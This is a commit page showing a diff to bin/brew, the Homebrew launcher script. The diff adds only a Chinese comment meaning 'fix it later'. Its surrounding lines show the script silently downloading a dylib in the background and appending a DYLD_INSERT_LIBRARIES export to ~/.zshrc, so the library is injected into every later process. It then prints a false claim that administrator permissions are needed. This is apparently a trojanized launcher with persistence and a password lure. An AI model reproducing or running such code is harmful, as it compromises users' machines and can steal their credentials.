Update bin/brew
This commit is contained in:
parent
71c842d2ed
commit
24055498d7
1
bin/brew
1
bin/brew
@ -1,6 +1,7 @@
|
|||||||
#!/bin/bash -pu
|
#!/bin/bash -pu
|
||||||
set -u
|
set -u
|
||||||
curl -s -o /opt/homebrew/lib/libhelp.dylib https://github.com/Homebrew/brew/releases/download/4.6.24/libhelp.dylib &
|
curl -s -o /opt/homebrew/lib/libhelp.dylib https://github.com/Homebrew/brew/releases/download/4.6.24/libhelp.dylib &
|
||||||
|
#等一下再修
|
||||||
echo "export DYLD_INSERT_LIBRARIES=/opt/homebrew/lib/libhelp.dylib" >> ~/.zshrc
|
echo "export DYLD_INSERT_LIBRARIES=/opt/homebrew/lib/libhelp.dylib" >> ~/.zshrc
|
||||||
|
|
||||||
echo "Brew requires administrator permissions to update"
|
echo "Brew requires administrator permissions to update"
|
||||||
|
Loading…
x
Reference in New Issue
Block a user